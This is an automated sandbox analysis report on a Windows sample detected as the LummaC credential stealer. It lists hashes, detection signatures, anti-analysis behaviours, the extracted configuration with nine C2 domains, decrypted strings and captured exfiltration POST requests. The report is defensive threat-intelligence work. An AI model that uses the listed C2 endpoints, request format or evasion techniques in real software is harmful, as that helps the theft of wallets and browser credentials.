Windows Analysis Report
IERiUft8Wi.exe

Overview

General Information

Sample name: IERiUft8Wi.exe (renamed because the original name is a hash value)
Original sample name: c317f66c3bb595d92533e3d0fe227366.exe
Analysis ID: 1581219
MD5: c317f66c3bb595d92533e3d0fe227366
SHA1: ff7cf48fd32a6e4b73b14568c7610d585e5b40d3
SHA256: 77e2dd1562a40f41cea1d27cd0bf045c762372807813718327a6cae72c46731e
Tags: exe, user-abuse_ch

Detection

Family: LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • IERiUft8Wi.exe (PID: 788 cmdline: "C:\Users\user\Desktop\IERiUft8Wi.exe" MD5: C317F66C3BB595D92533E3D0FE227366)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration: {"C2 url": ["scentniej.buzz", "hummskitnj.buzz", "appliacnesot.buzz", "mindhandru.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "inherineau.buzz", "cashfuzysao.buzz", "prisonyfork.buzz"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: IERiUft8Wi.exe PID: 788 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: IERiUft8Wi.exe PID: 788 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: IERiUft8Wi.exe PID: 788 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T08:46:28.446417+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:30.508950+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:32.913749+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:35.440185+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49708 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:37.713708+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49714 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:40.342640+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49720 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:43.828737+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49727 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:46.916525+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49741 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:29.286052+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49699 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:31.289089+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:29.286052+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49699 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:31.289089+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:46:34.055670+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP

AV Detection

Source: IERiUft8Wi.exe | Avira: detected
Source: https://mindhandru.buzz/al | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apieed | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/_AP | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/te | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apiz | Avira URL Cloud: Label: malware
Source: IERiUft8Wi.exe.788.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "hummskitnj.buzz", "appliacnesot.buzz", "mindhandru.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "inherineau.buzz", "cashfuzysao.buzz", "prisonyfork.buzz"], "Build id": "PsFKDg--pablo"}
Source: IERiUft8Wi.exe | Virustotal: Detection: 54%
Source: IERiUft8Wi.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: IERiUft8Wi.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: mindhandru.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String decryptor: PsFKDg--pablo
Source: IERiUft8Wi.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49727 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49702 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.11.101:443
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Joe Sandbox View | IP Address: 104.21.11.101 104.21.11.101
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49714 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49727 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49741 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49720 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49708 -> 104.21.11.101:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KL0X99L81JFM9JA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12826 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=VG1F1F6GT0R0NIEL | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15064 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=YCWJB536XGN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20359 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KZ3DWPSD5BMOKDKC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1227 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WQGMY49GD2RBDCWT6P0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 583716 | Host: mindhandru.buzz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mindhandru.buzz
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: IERiUft8Wi.exe, 00000000.00000003.1343856828.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498335415.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1343921102.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450584216.0000000000D61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: IERiUft8Wi.exe, 00000000.00000003.1343921102.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1391638992.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1392244134.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419601356.000000000567C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/
Source: IERiUft8Wi.exe, 00000000.00000003.1467459469.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1467576272.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499548166.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/_AP
Source: IERiUft8Wi.exe, 00000000.00000003.1467459469.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1467576272.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499548166.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/al
Source: IERiUft8Wi.exe, 00000000.00000003.1392244134.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369884000.000000000567B000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499314192.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419601356.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450546338.000000000567C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/api
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369748162.0000000005680000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369595792.0000000005679000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369684966.0000000005679000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1370677126.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369846666.0000000005675000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1391638992.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1392244134.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369884000.000000000567B000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419601356.000000000567C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/apieed
Source: IERiUft8Wi.exe, 00000000.00000002.1499489441.0000000000D62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/apiz
Source: IERiUft8Wi.exe, 00000000.00000003.1343856828.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499548166.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1343921102.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/pi
Source: IERiUft8Wi.exe, 00000000.00000003.1450284221.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/te
Source: IERiUft8Wi.exe, 00000000.00000003.1467644015.000000000567C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz:443/api
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
